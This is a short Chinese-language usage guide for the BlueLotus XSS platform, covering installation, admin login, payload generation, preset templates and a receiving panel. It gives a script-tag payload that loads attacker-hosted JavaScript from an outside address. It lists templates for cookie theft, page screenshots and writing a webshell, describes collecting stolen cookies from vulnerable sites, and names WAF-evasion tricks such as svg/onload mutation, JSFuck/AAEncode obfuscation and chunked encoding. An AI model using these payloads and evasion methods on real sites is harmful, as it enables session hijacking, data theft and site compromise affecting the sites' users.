BlueLotus XSS管理后台使用指南

目录

一、BlueLotus简介

二、系统安装与配置

1. 安装步骤

三、后台登录

四、核心功能使用

1. 我的JS

2. 公共模版

3. XSS接收面板

五、防御规避策略

---

一、BlueLotus简介

BlueLotus（蓝莲花）是一款功能强大的XSS漏洞测试与管理平台，它提供了一个集中化的管理后台，可以帮助安全研究人员高效地管理和利用XSS漏洞。

图1：BlueLotus平台界面

二、系统安装与配置

1. 安装步骤

1. 下载BlueLotus最新版本

2. 解压到Web服务器目录

3. 访问安装向导页面

4. 按照提示完成数据库配置

三、后台登录

访问后台登录地址（通常为http://192.168.21.4/BlueLotus/login.php），输入管理员账号密码。

图2：后台登录界面

四、核心功能使用

1. 我的JS

发现XSS漏洞后，可以在"漏洞管理"中添加记录：

1. 点击"新增"

2. 选择插入模版

3. 生成payload

4. 复制js内容

<script src="http://192.168.21.4/BlueLotus/myjs/alert.js"></script>

图3：JS可进行编码

2. 公共模版

BlueLotus提供了多种预置的XSS攻击载荷：

1. 弹框测试

2. Cookie窃取

3. 网站截屏

4. 写一句话木马

图4：公共模版界面

3. XSS接收面板

在左侧菜单点击"项目管理"→"添加项目"，填写项目信息：

• 接收时间

• 接收IP

• 客户端

• 携带数据

将构造的JS，插入存在xss漏洞的网站

图5：收到的接收cookie信息

五、防御规避策略

对抗WAF技巧，内置绕过方案：

1. HTML标签变异（<svg/onload=>）

2. 编码混淆（JSFuck/AAEncode）

3. 分块传输编码